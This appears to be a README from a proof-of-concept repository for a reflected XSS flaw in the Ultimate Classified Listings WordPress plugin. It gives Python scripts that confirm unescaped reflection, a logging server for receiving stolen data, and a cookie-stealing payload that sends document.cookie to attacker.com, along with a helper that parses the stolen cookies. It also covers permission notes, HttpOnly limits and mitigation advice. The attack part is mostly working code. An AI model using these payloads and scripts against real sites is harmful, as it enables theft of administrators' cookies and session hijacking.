This repository contains Proof of Concept (PoC) scripts for various vulnerabilities discovered in different WordPress plugins. These scripts demonstrate how attackers can exploit these vulnerabilities to perform malicious actions.
## Vulnerabilities

1. **Reflected Cross-Site Scripting (XSS) in Ultimate Classified Listings Plugin**
   - A vulnerability in the Ultimate Classified Listings WordPress plugin before version 1.4 allows attackers to execute arbitrary JavaScript in a victim's browser by injecting a script through a request parameter that the plugin reflects into the page without sanitizing or escaping it.
2. **Stealing Cookies Using XSS**
   - Demonstrates how an attacker can chain the reflected XSS to exfiltrate the cookies of a high-privilege user, such as an administrator, to an attacker-controlled server.

## Reflected XSS PoC

This PoC demonstrates how to exploit the reflected XSS vulnerability in the Ultimate Classified Listings plugin.
1. **Identify the Vulnerable Parameter**
   - Assume the vulnerable parameter is `search` in the URL `http://example.com/classifieds`.

2. **Craft a Malicious URL**
   - The malicious URL can include a payload that executes an alert dialog:

     ```
     http://example.com/classifieds?search=<script>alert('XSS')</script>
     ```

3. **Run the PoC Script**
   - Save the following script as `xss_poc.py` and run it (it requires the `requests` package). The script only confirms that the payload is reflected unescaped in the HTML; the JavaScript itself runs when a victim opens the printed URL in a browser.

     ```python
     import requests

     # Configuration
     target_url = "http://example.com/classifieds"  # Change this to the target site's URL
     param = "search"                                # Vulnerable parameter
     payload = "<script>alert('XSS')</script>"        # XSS payload


     def trigger_xss():
         # Let requests percent-encode the payload into the query string;
         # the server decodes it before reflecting it into the page.
         response = requests.get(target_url, params={param: payload}, timeout=10)
         malicious_url = response.url  # The fully encoded URL that was requested

         # Check whether the payload is reflected unescaped in the response
         if payload in response.text:
             print("[+] XSS payload reflected in the response.")
             print("[+] Malicious URL:", malicious_url)
         else:
             print("[-] XSS payload not reflected in the response.")


     if __name__ == "__main__":
         trigger_xss()
     ```
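The following helper complements the steps above. It is added here as an illustration and is not one of the repository's scripts: it builds the percent-encoded form of the PoC URL (what a browser or `requests` actually sends) and classifies how a response reflects the payload, separating the unescaped reflection of a vulnerable version from the entity-encoded output that escaping on output produces, and checks that the response is served as HTML at all. The target URL, parameter name and the two sample response bodies are constructed for the example.

```python
from html import unescape
from urllib.parse import urlencode

# Same payload as the PoC above
PAYLOAD = "<script>alert('XSS')</script>"


def build_malicious_url(target_url, param, payload):
    """Return the PoC URL with the payload percent-encoded into the query string.

    Browsers and `requests` encode the link this way before sending it; the
    server decodes it, so this is the form to hand to a victim.
    """
    return f"{target_url}?{urlencode({param: payload})}"


def classify_reflection(body, payload):
    """Classify how an HTML response body reflects the payload.

    'unescaped'    - the raw payload is present, so the script tag is live
    'html-escaped' - the payload appears only with <, >, ' etc. entity-encoded
                     (what escaping on output, e.g. esc_html(), produces)
    'absent'       - the payload is not reflected at all
    """
    if payload in body:
        return "unescaped"
    # Decoding entities recovers the payload if it was reflected escaped
    if payload in unescape(body):
        return "html-escaped"
    return "absent"


def is_exploitable(content_type, body, payload):
    """The reflection only executes as script if the browser renders the
    response as HTML; an unescaped reflection in a JSON or text/plain
    response is not XSS by itself."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    return media_type == "text/html" and classify_reflection(body, payload) == "unescaped"


# Constructed sample responses (not captured from a real site):
# a vulnerable version echoing the parameter as-is ...
VULNERABLE_BODY = "<h2>Search results for: <script>alert('XSS')</script></h2>"
# ... and a patched version escaping it on output (PHP-style &#039; for the quote)
PATCHED_BODY = (
    "<h2>Search results for: &lt;script&gt;alert(&#039;XSS&#039;)&lt;/script&gt;</h2>"
)

if __name__ == "__main__":
    print(build_malicious_url("http://example.com/classifieds", "search", PAYLOAD))
    for label, body in (("vulnerable", VULNERABLE_BODY), ("patched", PATCHED_BODY)):
        print(f"{label}: {classify_reflection(body, PAYLOAD)}")
```

Run against a live response, `classify_reflection(response.text, payload)` returning `html-escaped` is the expected result on version 1.4 or later, which is the quickest way to confirm that an update actually closed the hole rather than just hid it.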
## Cookie Stealing PoC

This PoC demonstrates how an attacker can exploit the reflected XSS vulnerability to steal cookies from high-privilege users.

1. **Set Up a Malicious Server**
   - Save the following script as `malicious_server.py` and run it on a host the victim's browser can reach. It logs every incoming request, including the request path that carries the exfiltrated cookies.

     ```python
     from http.server import BaseHTTPRequestHandler, HTTPServer
     import logging


     class RequestHandler(BaseHTTPRequestHandler):
         def do_GET(self):
             # The stolen cookies arrive in the query string (?cookie=...), so log
             # the request path as well as the client address and headers.
             logging.info("Request from %s: %s", self.client_address[0], self.path)
             logging.info("Headers:\n%s", self.headers)
             self.send_response(200)
             self.end_headers()


     def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
         logging.basicConfig(filename='server.log', level=logging.INFO)
         server_address = ('', port)
         httpd = server_class(server_address, handler_class)
         logging.info('Starting server on port %d...', port)
         httpd.serve_forever()


     if __name__ == "__main__":
         run()
     ```

2. **Craft a Payload to Steal Cookies**
   - Create a payload that sends the victim's cookies to the malicious server (`encodeURIComponent` keeps the `;` and `=` characters of the cookie string intact in the query string):

     ```
     http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080/?cookie='+encodeURIComponent(document.cookie);</script>
     ```

3. **Run the PoC Script**
   - Save the following script as `steal_cookies_poc.py` and run it. As before, the script only confirms that the payload is reflected; the cookies are sent to the malicious server when an authenticated victim opens the printed URL. Note that `document.cookie` exposes only cookies set without the HttpOnly flag, and WordPress sets its authentication cookies (`wordpress_sec_*`, `wordpress_logged_in_*`) with HttpOnly, so this payload captures cookies such as `wp-settings-*` but not the session cookies themselves.

     ```python
     import requests

     # Configuration
     target_url = "http://example.com/classifieds"  # Change this to the target site's URL
     attacker_server = "http://attacker.com:8080"    # Change this to your malicious server's URL
     param = "search"                                # Vulnerable parameter
     payload = (
         "<script>new Image().src='"
         f"{attacker_server}/?cookie='+encodeURIComponent(document.cookie);</script>"
     )


     def trigger_xss():
         # Let requests percent-encode the payload into the query string
         response = requests.get(target_url, params={param: payload}, timeout=10)
         malicious_url = response.url  # The fully encoded URL that was requested

         # Check whether the payload is reflected unescaped in the response
         if payload in response.text:
             print("[+] XSS payload reflected in the response.")
             print("[+] Malicious URL (deliver this to the victim):", malicious_url)
         else:
             print("[-] XSS payload not reflected in the response.")


     if __name__ == "__main__":
         trigger_xss()
     ```
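As a second added example (again not one of the repository's scripts), the helpers below cover the receiving side of the cookie-stealing payload and its main limitation. `extract_cookies` parses the `cookie=` query parameter out of a request path as the payload above sends it, assuming the cookie string went through `encodeURIComponent`; `script_visible_cookies` simulates which of a server's `Set-Cookie` headers a browser exposes to `document.cookie`, namely those without HttpOnly. The sample request path and `Set-Cookie` headers are constructed, modelled on WordPress cookie names, and were not captured from a real site.

```python
from http.cookies import SimpleCookie
from urllib.parse import unquote, urlparse


def extract_cookies(request_path):
    """Parse the cookies out of a request path the payload generates, e.g.
    /?cookie=wp-settings-1%3Deditor%3B%20wp-settings-time-1%3D1700000000

    document.cookie is 'name=value; name2=value2', URL-encoded once by
    encodeURIComponent, so decode it once and split on ';'.
    """
    query = urlparse(request_path).query
    raw = ""
    for pair in query.split("&"):
        name, sep, value = pair.partition("=")
        if sep and name == "cookie":
            raw = unquote(value)
            break
    cookies = {}
    for part in raw.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies


def script_visible_cookies(set_cookie_headers):
    """Return the names of cookies that document.cookie exposes: those set
    without the HttpOnly attribute. HttpOnly cookies are still attached to
    requests the page makes, but script cannot read (and exfiltrate) them."""
    visible = []
    for header in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            if not morsel["httponly"]:
                visible.append(name)
    return visible


# Constructed Set-Cookie headers modelled on a WordPress login response
# (hash suffixes shortened). WordPress sets its authentication cookies with
# HttpOnly, so the payload captures only the wp-settings-* cookies.
SAMPLE_SET_COOKIES = [
    "wordpress_sec_abc=admin%7C1700000000%7Ctoken; path=/wp-content/plugins; secure; HttpOnly",
    "wordpress_logged_in_abc=admin%7C1700000000%7Ctoken; path=/; secure; HttpOnly",
    "wp-settings-1=editor%3Dtinymce; path=/",
    "wp-settings-time-1=1700000000; path=/",
]

# Constructed request path as the payload would produce it for those cookies
SAMPLE_REQUEST_PATH = (
    "/?cookie=wp-settings-1%3Deditor%253Dtinymce%3B%20wp-settings-time-1%3D1700000000"
)

if __name__ == "__main__":
    print("readable by document.cookie:", script_visible_cookies(SAMPLE_SET_COOKIES))
    print("received by the server:", extract_cookies(SAMPLE_REQUEST_PATH))
```

The practical consequence is that against a default WordPress install this payload does not yield a reusable admin session; to act with the administrator's privileges the injected script would have to issue the requests itself from within the victim's page, where the HttpOnly cookies are still sent.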
## Notes

- **Permissions**: Ensure you have explicit written permission to test these vulnerabilities on the target site. Unauthorized access is illegal and unethical.
- **Testing Environment**: Perform these tests in a controlled environment (for example, a local WordPress instance with the affected plugin version installed) to avoid impacting production systems.
- **Mitigation**: Update the Ultimate Classified Listings plugin to version 1.4 or later. Plugin developers should validate input and escape it on output for the context it is written into (in WordPress, `esc_html()` for HTML text and `esc_attr()` for attribute values); a Content Security Policy and the HttpOnly flag on session cookies reduce the impact of XSS but do not remove the underlying flaw.
These PoCs demonstrate how an attacker could exploit vulnerabilities in WordPress plugins to perform malicious actions. Always keep your software up-to-date and follow security best practices to prevent such vulnerabilities.